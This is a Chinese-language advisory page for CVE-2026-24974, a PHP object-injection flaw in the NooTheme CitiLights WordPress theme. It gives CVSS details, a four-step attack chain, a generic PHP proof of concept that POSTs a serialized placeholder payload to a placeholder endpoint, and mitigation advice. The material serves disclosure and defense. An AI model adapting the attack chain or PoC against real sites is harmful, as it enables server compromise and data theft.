CVE-2026-24974 CVSS 8.8 高危

CVE-2026-24974 NooTheme CitiLights 反序列化漏洞

披露日期: 2026-03-25

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-24974

漏洞类型

反序列化漏洞

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

NooTheme CitiLights

漏洞概述

NooTheme CitiLights WordPress主题存在反序列化漏洞，攻击者可利用此漏洞进行对象注入攻击。由于程序未正确过滤用户提供的不可信数据，低权限攻击者可以通过发送特制的序列化数据触发该漏洞。成功的利用可能导致远程代码执行，从而完全控制受影响的服务器，造成数据泄露或系统被破坏。

技术细节

该漏洞源于NooTheme CitiLights主题在处理特定请求参数时，直接调用了PHP的unserialize()函数，而未对输入数据进行安全验证。攻击者利用这一缺陷，可以构造恶意的序列化字符串。当服务器端解析该字符串时，会自动实例化对象并调用魔术方法（如__wakeup()或__destruct()）。如果结合应用程序中存在的可用类（POP链），攻击者可进一步控制执行流，最终在服务器上下文中执行任意PHP代码或系统命令。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标网站使用了NooTheme CitiLights主题，并确认版本在3.7.1及以下。

STEP 2

2. 载荷构造

攻击者分析主题代码，寻找可利用的PHP类（POP链），并构造包含恶意代码的序列化数据。

STEP 3

3. 漏洞利用

攻击者通过HTTP请求将特制的序列化数据发送至存在漏洞的接口。

STEP 4

4. 代码执行

服务器端反序列化数据，触发对象注入，导致在服务器上执行任意系统命令或获取Webshell。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<?php
// PoC for CVE-2026-24974: PHP Object Injection
// Note: This is a generic example. The actual gadget chain depends on the theme's codebase.

class GenericObject {
    public $data;
}

// Create the object to be injected
$payload_obj = new GenericObject();
$payload_obj->data = "malicious_command_or_shellcode";

// Serialize the object
$serialized_payload = serialize($payload_obj);

// Target URL (Vulnerable endpoint)
$target_url = "http://target-site/wp-content/themes/noo-citilights/vulnerable_endpoint.php";

// Send the payload using cURL
$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, "inject_param=" . urlencode($serialized_payload));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

if ($response) {
    echo "Payload sent. Check server for execution.\n";
} else {
    echo "Failed to send payload.\n";
}
?>

影响范围

NooTheme CitiLights <= 3.7.1

防御指南

临时缓解措施

建议立即检查并更新主题至修复版本。在无法立即升级的情况下，应通过Web应用防火墙（WAF）拦截包含PHP序列化特征（如O:数字:）的HTTP请求参数，或限制对主题相关目录的访问权限，以阻断攻击尝试。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表